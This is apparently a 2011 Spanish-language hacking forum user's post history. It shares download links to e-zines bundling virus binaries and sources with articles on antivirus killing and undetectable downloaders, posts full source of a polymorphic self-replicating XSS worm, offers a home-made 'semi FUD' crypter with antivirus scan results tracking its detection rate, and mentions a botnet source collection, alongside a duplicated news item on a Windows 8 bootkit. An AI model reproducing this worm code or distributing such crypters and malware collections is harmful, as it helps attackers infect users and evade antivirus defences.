121
Programacion General / Re:full curso de programacion completo + software
« en: Diciembre 23, 2011, 02:38:38 am »
que pasado oscuro tuve 
jeje
jeje
Cargando
Mostrar Mensajes
Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.
122
Off-Topic / Re:Digan sus paises (ubicacion)
« en: Diciembre 23, 2011, 02:25:55 am »Citar
Hola... r@mbyte veo que nos dejado de lado tu encriptacion....
yo vivo en /zdye6y0Xz5t8Ldr/bn5di=KRoB5di=KRjmynQTT
BASE-64 >MEGAN-35>TRIPO-5 <
123
Off-Topic / Re:Digan sus paises (ubicacion)
« en: Diciembre 20, 2011, 01:01:56 am »
yo vivo en /zdye6y0Xz5t8Ldr/bn5di=KRoB5di=KRjmynQTT
BASE-64 >MEGAN-35>TRIPO-5
BASE-64 >MEGAN-35>TRIPO-5
124
Manuales y revistas / manuales e-zine mitosis
« en: Diciembre 02, 2011, 10:46:42 pm »
bueno aca les dejo algunos manuales que me encontre en la red xd
:: Mitosis eZine #1 ::
GEDZAC Mitosis E-zine #1
Primera e-zine del grupo GEDZAC, contiene artículos de Kuasanagui, ErGrone, XpLoAD, Jtag y MachineDramon, virus, sources etc.. interfaz gráfica amigable para el usuario.
Articulos:
·Como tratar de evitar los Scan de antivirus OnLine
·Componentes BAT
·Construcción de un applet de panel de control utilizando Delphi
·Envio de correo y configuracion de firmas en Outlook
·Folder infection using batch and debug script
·Infección por carpetas
·Infeccion de documentos de Word y Excel usando VB 6.0
·Infeccion de redes P2P con VB 6.0
·MSN Messenger y la propagacion masiva
·Partes básicas para construir un gusano de Recursos compartidos
·Scripts VBS indetectables, adiós al ScriptBlocking y la heurística
·Técnicas avanzadas para la programación de virus batch.
·Vulnerabilidades de internet explorer 5.x
Virus (Bin):
·Win32.Kitro.A
·Win32.Gaghiel.A
·Win32.Gaghiel.B
·Win32.Hantaner.A
·Win32.Hokilo.A
·Win32.Sachiel.D
Virus (Sources):
·Win32.Kitro.A
·Win32.Hokilo.A
·Win32.Sachiel.D
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.1.zip
:: Mitosis eZine #2 ::
GEDZAC Mitosis E-zine #2
Segunda entrega de la e-zine, contiene artículos de Byt3Cr0w, Nemlim, MachineDramon, DemionKlaz, Morusa, Falckon, 3sk0rbut0 y Protozoo, virus, sources etc.. interfaz gráfica amigable para el usuario.
Articulos:
·Apóptosis
·Bug del Object Data
·Downloaders en VB & VBS
·Encriptacion en VB & VBS
·Exploit CHM
·IE 5.X y IE 6.X Bugs
·Infeccion de Ejecutables bajo VB
·Infeccion de Zip's y Rar's
·Infeccion por Suplantacion de Archivos
·MacroVirus
·Obtener el Offset de un Icono dentro de un PE
·Polimorfismo en Visual Basic
·Problemas de Reproduccion P2P bajo VB
·Programacion Basica de Troyanos
·Propagacion por mIRC
·Sockets en VB & VBS
·TCP Worm Comunication System
·Tecnicas Simples Antidebugging
·Terminar Procesos de Antivirus
·Virus que no se pueden Finalizar
Virus (Bin):
·Win32.Mabel.A
·Win32.Renalo.A
·Win32.Mapson.A
·Win32.Mapson.C
·Win32.Mapson.D
·Win32.Smeagol.A
·Win32.Israfel.A
·Win32.Alanis.A
·Win32.Bardiel.A
·Win32.Bardiel.C
·Win32.Capside.A
·Win32.Nodfu.B
Virus (Sources):
·Win32.Bardiel.B
·Win32.Capside.A
·Win32.Lorraine.A
·Win32.Mapson.D
·Win32.Multi-Infector.A
·Win32.Smeagol.A
·Win97.PolyEnc.A.Word-Macro
·VBS.Israfel.A
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.2.zip
:: Mitosis eZine #3 ::
GEDZAC Mitosis E-zine #3
Tercera entrega de la e-zine, contiene artículos en HTML de Byt3Cr0w, Nemlim, MachineDramon, Morusa y Pana_Infierno, con ejemplos, muchos codes sources, virus, y utilidades... interfaz gráfica amigable para el usuario.
Articulos:
·Analizando y desactivando nuevas tecnologias antivirales
·Buscar correos en los buscadores
·Ejecutarnos cuando se abre una carpeta
·Eliminacion segura de datos
·Inhabilitando al NOD32
·Nuevas Tecnicas Stealth
·Manipular el registro de forma remota en WinXP
·Ocultar AV-Killer dentro de los antivirus
·Propagacion basica mediante motor SMTP
·Propagacion en Yahoo Messenger por archivos compartidos
·Reproduccion por MSN Messenger
·Spam en programas de mensajeria instantanea
·Teoria sobre los contactos del MSN
·Varias vulnerabilidades
·VBScript en Delphi
Virus (Bin):
·Win32.Darby.M
·Win32.Ireul.A
·Win32.Neval.A
·Win32.Lozk.A
·Win32.Amy.A
·Win32.SeeleMSI.A
Virus (Sources):
·Win32.Darby.M
·Win32.GedBot.A
·Win32.Ireul.A
·Win32.Lozk..A
·Win32.Amy.A
·Win32.Aitselom.A
·Win32.Seele.A
·Win32.Biztro
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.3.zip
:: Mitosis eZine #4 ::
GEDZAC Mitosis E-zine #4
Cuarta entrega de la e-zine, contiene artículos en HTML de Pana_Infierno, eCORE, Khronos, MOWPaX, VXCoder
Articulos:
·Infeccion cuando no tenemos privilegios - [SOURCE]
·Backdoor basico en ASM
·Comprimiendo en Delphi - [SOURCE]
·Conceptos basicos sobre Virus en Linux
·Dinamica de cifrado en ASM
·Downloader indetectable - [SOURCE]
·Eliminar AV al reiniciar
·Forma de eludir la SandBox del scan de BitDefender - [SOURCE]
·Identificando y eliminando Antivirus mas conocidos
·Infeccion de ejecutables mediante archivos proyectados en memoria
·Interprete String de un ejecutable
·Motor SMTP usando GMAIL bajo SSL en VB.NET
·Propagacion por MSN
·Protegiendo un ejecutable del borrado
·Protegiendonos en las llamadas a las APIs (Hardcoded Addresses)
·Siempre cargado en memoria
·Tecnicas de ganchos con las funciones de Windows
·Worms con motores de mini servidor HTTP - [SOURCE]
·Inyeciones en procesos
·Delphi con motor SMTP en PHP
·Winlogon Notification Package
Virus (Sources):
Win32.Akniram.A | Delphi
Win32.Botspon.A | Visual Basic 6
Win32.Chese.A | Delphi
Win32.Dyan.W | Assembler
Win32.gPrepender.A | Delphi
Win32.Gshell.A | C++
Win32.Mircge.A | Assembler
Win32.Jumpir.A | C++
Win32.Nekat.A | Visual Basic 6
Win32.Netpoison.A | Visual Basic 6
Win32.Aitselom.A | Delphi
Win32.Redlast.M | Assembler
Win32.Ryel.A | Assembler
Win32.Warnet.M | Delphi
Win32.Xio.A | C++
Win32.Cquo.A | Assembler
Win32.Angen.A | Delphi
JS.Gadez | JavaScript
Win32.Leliel | C++
Win32.Svchost.A | Delphi
Win32.MiniP2pWorm.A | Delphi
Win32.Nadia.A | Delphi
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.4.zip
IMPORTANTE:RECOMIENDO QUE UTILIZEN MAQUINAS VIRTUALES YA QUE EXISTEN ALGUNOS BINARIOS DE MALWARE QUE PUEDEN EJECUTAR POR EQUIVOCACION
fuente: http://www.gedzac.com/home.php?id=e-zine
:: Mitosis eZine #1 ::
GEDZAC Mitosis E-zine #1
Primera e-zine del grupo GEDZAC, contiene artículos de Kuasanagui, ErGrone, XpLoAD, Jtag y MachineDramon, virus, sources etc.. interfaz gráfica amigable para el usuario.
Articulos:
·Como tratar de evitar los Scan de antivirus OnLine
·Componentes BAT
·Construcción de un applet de panel de control utilizando Delphi
·Envio de correo y configuracion de firmas en Outlook
·Folder infection using batch and debug script
·Infección por carpetas
·Infeccion de documentos de Word y Excel usando VB 6.0
·Infeccion de redes P2P con VB 6.0
·MSN Messenger y la propagacion masiva
·Partes básicas para construir un gusano de Recursos compartidos
·Scripts VBS indetectables, adiós al ScriptBlocking y la heurística
·Técnicas avanzadas para la programación de virus batch.
·Vulnerabilidades de internet explorer 5.x
Virus (Bin):
·Win32.Kitro.A
·Win32.Gaghiel.A
·Win32.Gaghiel.B
·Win32.Hantaner.A
·Win32.Hokilo.A
·Win32.Sachiel.D
Virus (Sources):
·Win32.Kitro.A
·Win32.Hokilo.A
·Win32.Sachiel.D
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.1.zip
:: Mitosis eZine #2 ::
GEDZAC Mitosis E-zine #2
Segunda entrega de la e-zine, contiene artículos de Byt3Cr0w, Nemlim, MachineDramon, DemionKlaz, Morusa, Falckon, 3sk0rbut0 y Protozoo, virus, sources etc.. interfaz gráfica amigable para el usuario.
Articulos:
·Apóptosis
·Bug del Object Data
·Downloaders en VB & VBS
·Encriptacion en VB & VBS
·Exploit CHM
·IE 5.X y IE 6.X Bugs
·Infeccion de Ejecutables bajo VB
·Infeccion de Zip's y Rar's
·Infeccion por Suplantacion de Archivos
·MacroVirus
·Obtener el Offset de un Icono dentro de un PE
·Polimorfismo en Visual Basic
·Problemas de Reproduccion P2P bajo VB
·Programacion Basica de Troyanos
·Propagacion por mIRC
·Sockets en VB & VBS
·TCP Worm Comunication System
·Tecnicas Simples Antidebugging
·Terminar Procesos de Antivirus
·Virus que no se pueden Finalizar
Virus (Bin):
·Win32.Mabel.A
·Win32.Renalo.A
·Win32.Mapson.A
·Win32.Mapson.C
·Win32.Mapson.D
·Win32.Smeagol.A
·Win32.Israfel.A
·Win32.Alanis.A
·Win32.Bardiel.A
·Win32.Bardiel.C
·Win32.Capside.A
·Win32.Nodfu.B
Virus (Sources):
·Win32.Bardiel.B
·Win32.Capside.A
·Win32.Lorraine.A
·Win32.Mapson.D
·Win32.Multi-Infector.A
·Win32.Smeagol.A
·Win97.PolyEnc.A.Word-Macro
·VBS.Israfel.A
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.2.zip
:: Mitosis eZine #3 ::
GEDZAC Mitosis E-zine #3
Tercera entrega de la e-zine, contiene artículos en HTML de Byt3Cr0w, Nemlim, MachineDramon, Morusa y Pana_Infierno, con ejemplos, muchos codes sources, virus, y utilidades... interfaz gráfica amigable para el usuario.
Articulos:
·Analizando y desactivando nuevas tecnologias antivirales
·Buscar correos en los buscadores
·Ejecutarnos cuando se abre una carpeta
·Eliminacion segura de datos
·Inhabilitando al NOD32
·Nuevas Tecnicas Stealth
·Manipular el registro de forma remota en WinXP
·Ocultar AV-Killer dentro de los antivirus
·Propagacion basica mediante motor SMTP
·Propagacion en Yahoo Messenger por archivos compartidos
·Reproduccion por MSN Messenger
·Spam en programas de mensajeria instantanea
·Teoria sobre los contactos del MSN
·Varias vulnerabilidades
·VBScript en Delphi
Virus (Bin):
·Win32.Darby.M
·Win32.Ireul.A
·Win32.Neval.A
·Win32.Lozk.A
·Win32.Amy.A
·Win32.SeeleMSI.A
Virus (Sources):
·Win32.Darby.M
·Win32.GedBot.A
·Win32.Ireul.A
·Win32.Lozk..A
·Win32.Amy.A
·Win32.Aitselom.A
·Win32.Seele.A
·Win32.Biztro
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.3.zip
:: Mitosis eZine #4 ::
GEDZAC Mitosis E-zine #4
Cuarta entrega de la e-zine, contiene artículos en HTML de Pana_Infierno, eCORE, Khronos, MOWPaX, VXCoder
Articulos:
·Infeccion cuando no tenemos privilegios - [SOURCE]
·Backdoor basico en ASM
·Comprimiendo en Delphi - [SOURCE]
·Conceptos basicos sobre Virus en Linux
·Dinamica de cifrado en ASM
·Downloader indetectable - [SOURCE]
·Eliminar AV al reiniciar
·Forma de eludir la SandBox del scan de BitDefender - [SOURCE]
·Identificando y eliminando Antivirus mas conocidos
·Infeccion de ejecutables mediante archivos proyectados en memoria
·Interprete String de un ejecutable
·Motor SMTP usando GMAIL bajo SSL en VB.NET
·Propagacion por MSN
·Protegiendo un ejecutable del borrado
·Protegiendonos en las llamadas a las APIs (Hardcoded Addresses)
·Siempre cargado en memoria
·Tecnicas de ganchos con las funciones de Windows
·Worms con motores de mini servidor HTTP - [SOURCE]
·Inyeciones en procesos
·Delphi con motor SMTP en PHP
·Winlogon Notification Package
Virus (Sources):
Win32.Akniram.A | Delphi
Win32.Botspon.A | Visual Basic 6
Win32.Chese.A | Delphi
Win32.Dyan.W | Assembler
Win32.gPrepender.A | Delphi
Win32.Gshell.A | C++
Win32.Mircge.A | Assembler
Win32.Jumpir.A | C++
Win32.Nekat.A | Visual Basic 6
Win32.Netpoison.A | Visual Basic 6
Win32.Aitselom.A | Delphi
Win32.Redlast.M | Assembler
Win32.Ryel.A | Assembler
Win32.Warnet.M | Delphi
Win32.Xio.A | C++
Win32.Cquo.A | Assembler
Win32.Angen.A | Delphi
JS.Gadez | JavaScript
Win32.Leliel | C++
Win32.Svchost.A | Delphi
Win32.MiniP2pWorm.A | Delphi
Win32.Nadia.A | Delphi
descarga
http://www.gedzac.com/ezine/Gedzac.Mitosis.Ezine.4.zip
IMPORTANTE:RECOMIENDO QUE UTILIZEN MAQUINAS VIRTUALES YA QUE EXISTEN ALGUNOS BINARIOS DE MALWARE QUE PUEDEN EJECUTAR POR EQUIVOCACION
fuente: http://www.gedzac.com/home.php?id=e-zine
125
Hacking Wireless / Re:Convirte tu pc portatil en enrutador
« en: Noviembre 30, 2011, 03:41:18 pm »
tremendo aporte kr34t0r xd esto me servira de mucho
salu2 manes
salu2 manes
127
Programación Web / worm xss
« en: Noviembre 30, 2011, 01:59:25 pm »
Estaba navegando por Internet y encontré esto, pensé que sería muy útil , como he escuchado a algunas personas hablar de buscar en el gusano XSS.
Código: [Seleccionar]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Polymorphic XSS Worm</title>
</head>
<body>
<textarea id="xssWorm" style="width:400px;height:600px;"></textarea>
<script type="text/javascript">
/* Polymorphic XSS Worm by John Leitch - john.leitch5@gmail.com */
/*worm start*/
var startToken = '/*worm start*/',
endToken = '/*worm ' + 'end*/';
function encode(code) {
var key = Math.floor(Math.random() * 256);
var packed = startToken + 'var k=' + key + ';var a=[';
for (var i = 0; i < code.length; i++) {
packed += (code.charCodeAt(i) ^ key) + ',';
}
packed += '];var d=\'\';' +
'for (var i=0;i<a.length;i++)' +
'{d+=String.fromCharCode(a[i]^k);}eval(d);' + endToken;
return packed;
}
function decode(code) {
var keyMatch = code.match(/var\sk=(\d+)/);
if (keyMatch == null) {
alert('key not found');
return;
}
var key = keyMatch[1];
var codeMatch = code.match(/var\sa=\[([\d{1,3},]+)\];/);
if (codeMatch == null) {
alert('packed code not found');
return;
}
var unpacked = '';
var codeBytes = codeMatch[1].split(',');
for (var i = 0; i < codeBytes.length; i++) {
if (!codeBytes[i]) {
continue;
}
unpacked += String.fromCharCode(codeBytes[i] ^ key);
}
return unpacked;
}
function findSelf(response) {
var x = response.indexOf(startToken) + startToken.length;
var y = response.indexOf(endToken, x);
var code = response.substring(x, y);
return code;
}
var code = findSelf(document.body.innerHTML);
if (code.indexOf('var k=') == 0) {
code = decode(code);
}
var encoded = encode(code);
// This is where the newly obfuscated worm (stored in encoded)
// is passed on to it's next target. But because we don't have a
// target we'll spit the newly obfuscated code out to a textarea.
document.getElementById('xssWorm').value = encoded;
/*worm end*/
</script>
</body>
</html>128
Off-Topic / Re:Feliz Cumpleaños Rock Lee 2992!!
« en: Noviembre 29, 2011, 04:57:57 pm »
feliz cumpleaños man que la pases bien
salu2
salu2
129
Descarga de Malwares / Re:simple crypter semi fud by mod r@mbyte
« en: Noviembre 28, 2011, 11:10:06 pm »Citar
La pass esta encriptada en todos los que muestras ahi ?si esta encriptada en todo lo que dice ahi
130
Descarga de Malwares / simple crypter semi fud by mod r@mbyte
« en: Noviembre 28, 2011, 07:12:06 pm »
bueno como me estoy iniciando en el modding aca les dejo unas de mis mods que hice a la apuranza jaja
me falto tiempo en dejarla fud para el proximo crypter les prometo que la dejare fud y la agregare eof
xd salu2 r@mbyte
File Info
Report date: 2011-11-28.
[/url]
Link to scan: http://my-avscan.com/result.php?scan=MjkzNDM5
File name: serverasd.exe
File size: 266252 bytes
MD5 Hash: 141c5e7fa3d29c580c80dc4df8cf94df
SHA1 Hash: 7881b4c8e684ee3254a5b18bf70911aac9bd3acc
Detection rate: 15 out of 35
Status: INFECTED
Detections
AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Win32/VBInject.D!generic.
F-PROT Antivirus -W32/VBTrojan.7!Maximus.
F-Secure Internet Security -Gen:Trojan.Heur.qm3@H9l5CXL.
G Data -Gen:Trojan.Heur.qm3@H9l5CXL (Engine-A).
IKARUS Security-Backdoor.Win32.Poison.
Kaspersky Antivirus -HEUR:Trojan.Win32.Generic.
McAfee -BackDoor-DZP.
MS Security Essentials -VirTool:Win32/VBInject.QV.
ESET NOD32 -Clean.
Norman -W32/VBInject.YG.
Norton -Clean.
Panda Security -Suspicious.
A-Squared Security -Backdoor.Win32.Poison!IK.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -infected Malware-Cryptor.VB.gen.1.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
Ad-Aware -Virtool.Win32.VBInject.gen (v).
AhnLab V3 Internet Security -Clean.
Bullguard -virus: Gen:Trojan.Heur.qm3@H9l5CXL.
Scan report generated by
My-AVScan.com
pass: caesar(keypress 25)/esab-64/ reverser/feron-74
descarga
http://www.multiupload.com/S2ZQFSC9HY
me falto tiempo en dejarla fud para el proximo crypter les prometo que la dejare fud y la agregare eof
xd salu2 r@mbyte
File Info
Report date: 2011-11-28.
[/url]
Link to scan: http://my-avscan.com/result.php?scan=MjkzNDM5
File name: serverasd.exe
File size: 266252 bytes
MD5 Hash: 141c5e7fa3d29c580c80dc4df8cf94df
SHA1 Hash: 7881b4c8e684ee3254a5b18bf70911aac9bd3acc
Detection rate: 15 out of 35
Status: INFECTED
Detections
AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Win32/VBInject.D!generic.
F-PROT Antivirus -W32/VBTrojan.7!Maximus.
F-Secure Internet Security -Gen:Trojan.Heur.qm3@H9l5CXL.
G Data -Gen:Trojan.Heur.qm3@H9l5CXL (Engine-A).
IKARUS Security-Backdoor.Win32.Poison.
Kaspersky Antivirus -HEUR:Trojan.Win32.Generic.
McAfee -BackDoor-DZP.
MS Security Essentials -VirTool:Win32/VBInject.QV.
ESET NOD32 -Clean.
Norman -W32/VBInject.YG.
Norton -Clean.
Panda Security -Suspicious.
A-Squared Security -Backdoor.Win32.Poison!IK.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -infected Malware-Cryptor.VB.gen.1.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
Ad-Aware -Virtool.Win32.VBInject.gen (v).
AhnLab V3 Internet Security -Clean.
Bullguard -virus: Gen:Trojan.Heur.qm3@H9l5CXL.
Scan report generated by
My-AVScan.com
pass: caesar(keypress 25)/esab-64/ reverser/feron-74
Citar
VlyvrT6oCZyy6ywZ6nxVrA44
descarga
http://www.multiupload.com/S2ZQFSC9HY
131
Noticias Informáticas / Stoned, el primer bootkit para Windows 8
« en: Noviembre 26, 2011, 04:16:46 pm »
Hace un par de meses, Microsoft anunció que estará implementando nuevas medidas de seguridad en la próxima versión de su sistema operativo, Windows 8. Para eso, han estado ocupados con Windows Defender para que trabaje en conjunto con su nueva característica de inicio seguro, Secure Boot; cuyo funcionamiento no permitiría que una aplicación acceda a la memoria del equipo sin estar firmada digitalmente durante la fase de booteo del sistema.
Sin embargo, también existen personas que están trabajando en buscar vulnerabilidades en los sistema operativos. En este caso, Peter Kleissner, ingeniero en software y desarrollador independiente, ha creado un exploit para saltar las políticas de seguridad de Windows 8. El investigador austríaco, no ha comunicado en forma detallada el proceso para realizar el ataque, sin embargo ha hecho público algunos datos del archivo de infección, bautizado de Stoned Lite, cuyo tamaño es de únicamente 14 kb. A continuación vemos la imagen de lo que sería la arquitectura del nuevo sistema de seguridad:
En primer lugar, la herramienta impide la ejecución de un gestor de arranque de sistemas operativos desconocidos. Luego, se ejecuta una rutina para gestionar las aplicaciones de terceros, y por último, se verifica que la aplicación que se va a correr es inofensiva para el sistema.
No obstante, Peter Kleissner ha demostrado en su artículo que todo este esquema de seguridad no es lo suficientemente fuerte para impedir la ejecución de aplicaciones que no están firmadas digitalmente.
En este caso, el exploit puede ser ejecutado, ya sea a través de un dispositivo USB o un CD, al inicio del sistema. Una vez cargado durante la etapa de booteo, según palabras de su propio desarrollador:
Devuelve el control del sistema operativo al usuario que le fue quitado desde Windows Vista con su política de controladores firmados
Stoned Bootkit, permitiría también brindar a los desarrolladores la posibilidad de cargar controladores que no han sido firmados digitalmente, así como también crear sus propias aplicaciones de booteo, como por ejemplo, herramientas de diagnóstico y etc.
Peter Kleissner, también comenta que su bootkit posee algunas novedades respecto a otros, ya que ataca a todas las versiones de Windows, desde XP hasta 7 y, además, sobrepasa el mecanismo de cifrado de unidades, TrueCrypt.
Al finalizar su investigación, Peter cita a su colega, Vipin Kumar:
No hay una solución para esto. No puede ser arreglado. Es un problema de diseño
Según el investigador, la única manera actual de poder bootear en forma segura es utilizando el Módulo de Plataforma de Confianza en conexión con cifrado completo de la unidad. No obstante, él también se encuentra trabajando para saltar ese mecanismo en la próxima versión de su exploit.
Ese exploit debería ser presentado oficialmente en la MalCon, la prestigiosa conferencia dedicada al malware y a la investigación en seguridad, que se llevará a cabo durante este fin de semana en Mumbai, India. Ahora, solo resta esperar de parte de Microsoft, algún tipo de solución para este problema antes del lanzamiento de su versión beta, esperada para el comienzo de 2012.
Sin embargo, también existen personas que están trabajando en buscar vulnerabilidades en los sistema operativos. En este caso, Peter Kleissner, ingeniero en software y desarrollador independiente, ha creado un exploit para saltar las políticas de seguridad de Windows 8. El investigador austríaco, no ha comunicado en forma detallada el proceso para realizar el ataque, sin embargo ha hecho público algunos datos del archivo de infección, bautizado de Stoned Lite, cuyo tamaño es de únicamente 14 kb. A continuación vemos la imagen de lo que sería la arquitectura del nuevo sistema de seguridad:
En primer lugar, la herramienta impide la ejecución de un gestor de arranque de sistemas operativos desconocidos. Luego, se ejecuta una rutina para gestionar las aplicaciones de terceros, y por último, se verifica que la aplicación que se va a correr es inofensiva para el sistema.
No obstante, Peter Kleissner ha demostrado en su artículo que todo este esquema de seguridad no es lo suficientemente fuerte para impedir la ejecución de aplicaciones que no están firmadas digitalmente.
En este caso, el exploit puede ser ejecutado, ya sea a través de un dispositivo USB o un CD, al inicio del sistema. Una vez cargado durante la etapa de booteo, según palabras de su propio desarrollador:
Devuelve el control del sistema operativo al usuario que le fue quitado desde Windows Vista con su política de controladores firmados
Stoned Bootkit, permitiría también brindar a los desarrolladores la posibilidad de cargar controladores que no han sido firmados digitalmente, así como también crear sus propias aplicaciones de booteo, como por ejemplo, herramientas de diagnóstico y etc.
Peter Kleissner, también comenta que su bootkit posee algunas novedades respecto a otros, ya que ataca a todas las versiones de Windows, desde XP hasta 7 y, además, sobrepasa el mecanismo de cifrado de unidades, TrueCrypt.
Al finalizar su investigación, Peter cita a su colega, Vipin Kumar:
No hay una solución para esto. No puede ser arreglado. Es un problema de diseño
Según el investigador, la única manera actual de poder bootear en forma segura es utilizando el Módulo de Plataforma de Confianza en conexión con cifrado completo de la unidad. No obstante, él también se encuentra trabajando para saltar ese mecanismo en la próxima versión de su exploit.
Ese exploit debería ser presentado oficialmente en la MalCon, la prestigiosa conferencia dedicada al malware y a la investigación en seguridad, que se llevará a cabo durante este fin de semana en Mumbai, India. Ahora, solo resta esperar de parte de Microsoft, algún tipo de solución para este problema antes del lanzamiento de su versión beta, esperada para el comienzo de 2012.
132
Descarga de Malwares / Re:70 MB de puro Source Botnet.
« en: Noviembre 26, 2011, 04:01:30 pm »Citar
de que botnet es el code o es onda como una recopilacion de botne's ?na man es una recopilacion de botnets puro source
xd saludo2 Shama|TwoH
133
Criptologia / Cifrado SSL en vb
« en: Noviembre 25, 2011, 10:52:48 pm »
aca les dejo el code que encontre en la red ,del cifrado ssl http://www.multiupload.com/YBYJK44W9F
134
Hacking / Re:ataques DOS desde cmd
« en: Noviembre 23, 2011, 12:26:22 am »
este metodo es antiguo en algunos os no funciona pero no esta demas postearlo xd
salu2
salu2